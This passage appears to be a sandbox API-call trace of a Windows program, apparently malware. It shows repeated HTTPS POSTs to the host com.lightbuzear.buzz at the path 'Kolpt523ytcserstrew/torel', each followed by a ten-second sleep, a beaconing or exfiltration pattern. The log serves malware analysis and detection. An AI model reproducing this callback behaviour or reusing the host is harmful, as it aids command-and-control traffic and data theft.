lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce730 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce740 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ec28 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ebe0 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ec28 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ebe0 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x4829d58 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0208.274] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x4829d58 | out: hHeap=0x4780000) returned 1 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x4829d58 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0208.274] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a488 [0208.275] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0208.276] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0208.276] GetProcAddress (hModule=0x71570000, lpProcName="InternetSetOptionA") returned 0x71611dc0 [0208.283] InternetSetOptionA (hInternet=0xcc000c, dwOption=0x1f, lpBuffer=0xde1c8*, dwBufferLength=0x4) returned 1 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a488 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce630 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5e0 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce680 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce570 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce640 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ecb8 [0208.284] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce640 | out: hHeap=0x4780000) returned 1 [0208.284] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ed00 [0208.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ecb8 | out: hHeap=0x4780000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0208.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed00 | out: hHeap=0x4780000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a438 [0208.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0208.285] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a438 | out: hHeap=0x4780000) returned 1 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a230 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fba90 [0208.285] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a208 [0208.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba90 | out: hHeap=0x4780000) returned 1 [0208.286] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0208.287] GetProcAddress (hModule=0x71570000, lpProcName="HttpSendRequestA") returned 0x71638e60 [0208.287] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type:application/x-www-form-urlencoded", dwHeadersLength=0x2e, lpOptional=0x47a6f78*, dwOptionalLength=0x4b2) returned 1 [0209.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a208 | out: hHeap=0x4780000) returned 1 [0209.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce750 [0209.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0209.644] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0209.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce570 [0209.644] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce630 [0209.644] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6f0 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6d0 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6f0 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6d0 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eac0 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ea78 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea78 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a438 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a438 | out: hHeap=0x4780000) returned 1 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a348 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbcf8 [0209.645] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a488 [0209.645] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbcf8 | out: hHeap=0x4780000) returned 1 [0209.646] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0209.646] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0209.646] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x5) returned 1 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a488 | out: hHeap=0x4780000) returned 1 [0209.647] GetModuleHandleA (lpModuleName="Wininet.dll") returned 0x71570000 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5e0 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce680 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce5e0 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce680 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6e0 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5e0 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed00 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ead8 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed00 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ead8 | out: hHeap=0x4780000) returned 1 [0209.647] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a438 [0209.647] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fba58 [0209.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a438 | out: hHeap=0x4780000) returned 1 [0209.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a208 [0209.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb908 [0209.648] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a280 [0209.648] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0209.649] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fba58 | out: hHeap=0x4780000) returned 1 [0209.649] GetProcAddress (hModule=0x71570000, lpProcName="InternetReadFile") returned 0x715f7320 [0209.649] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0xde2f4, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0xde290 | out: lpBuffer=0xde2f4*, lpdwNumberOfBytesRead=0xde290*=0x0) returned 1 [0209.649] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a280 | out: hHeap=0x4780000) returned 1 [0209.649] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0209.649] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0209.650] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0209.650] FreeLibrary (hLibModule=0x71570000) returned 1 [0209.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0209.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce750 | out: hHeap=0x4780000) returned 1 [0209.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0209.650] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a0a0 | out: hHeap=0x4780000) returned 1 [0209.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0209.651] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0209.655] Sleep (dwMilliseconds=0x2710) [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce690 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce5a0 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce6e0 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6b0 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6e0 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5c0 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6b0 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ed30 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5c0 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eda8 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ed30 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0209.685] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ed30 [0209.685] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0209.686] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a078 | out: hHeap=0x4780000) returned 1 [0209.686] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a078 [0209.686] LoadLibraryW (lpLibFileName="Urlmon.dll") returned 0x71780000 [0209.686] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce6c0 [0209.686] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce690 [0209.686] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce630 [0209.686] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce690 | out: hHeap=0x4780000) returned 1 [0209.686] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce630 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce5a0 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eda8 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eb50 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eda8 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b4d0 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb50 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a1b8 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b4d0 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fbc50 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a0a0 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fb940 [0209.687] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0209.687] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb940 | out: hHeap=0x4780000) returned 1 [0209.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0209.688] GetProcAddress (hModule=0x71780000, lpProcName="ObtainUserAgentString") returned 0x71852f30 [0209.688] ObtainUserAgentString (in: dwOption=0x0, pszUAOut=0xdf2f4, cbSize=0xde1cc | out: pszUAOut="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", cbSize=0xde1cc) returned 0x0 [0209.688] FreeLibrary (hLibModule=0x71780000) returned 1 [0209.688] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1b8 | out: hHeap=0x4780000) returned 1 [0209.688] InternetOpenA (lpszAgent="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1b8 [0209.689] InternetConnectA (hInternet=0xcc0004, lpszServerName="com.lightbuzear.buzz", nServerPort=0x1bb, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce730 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0209.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce620 [0209.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce670 [0209.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce620 | out: hHeap=0x4780000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce6a0 [0209.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce670 | out: hHeap=0x4780000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea18 [0209.689] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0209.689] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eac0 [0209.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea18 | out: hHeap=0x4780000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0209.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eac0 | out: hHeap=0x4780000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ec88 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0209.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a1e0 | out: hHeap=0x4780000) returned 1 [0209.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a1e0 [0209.690] LoadLibraryW (lpLibFileName="Wininet.dll") returned 0x71570000 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a398 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce710 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce740 [0209.690] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0209.690] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce740 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6c0 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce710 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6c0 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482ea48 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482eaa8 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ea48 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b590 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eaa8 | out: hHeap=0x4780000) returned 1 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x10) returned 0x482ec40 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a258 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a258 | out: hHeap=0x4780000) returned 1 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b590 | out: hHeap=0x4780000) returned 1 [0209.691] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="Kolpt523ytcserstrew/torel", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x0, dwFlags=0x800000, dwContext=0x0) returned 0xcc000c [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1) returned 0x47ce5a0 [0209.691] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2) returned 0x47ce710 [0209.691] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce5a0 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x3) returned 0x47ce730 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce710 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x4) returned 0x47ce6a0 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce730 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x6) returned 0x47ce570 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce6a0 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x9) returned 0x482eb20 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47ce570 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0xd) returned 0x482ecd0 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482eb20 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x13) returned 0x480b5d0 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482ecd0 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x1c) returned 0x482a2a8 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x480b5d0 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x2a) returned 0x47fb908 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x482a2a8 | out: hHeap=0x4780000) returned 1 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a4b0 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x30) returned 0x47fbc50 [0209.692] RtlAllocateHeap (HeapHandle=0x4780000, Flags=0x0, Size=0x20) returned 0x482a3e8 [0209.692] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fbc50 | out: hHeap=0x4780000) returned 1 [0209.693] HeapFree (in: hHeap=0x4780000, dwFlags=0x0, lpMem=0x47fb908 | out: hHeap=0x4780000) returned 1 [0209.693] GetProcAddress 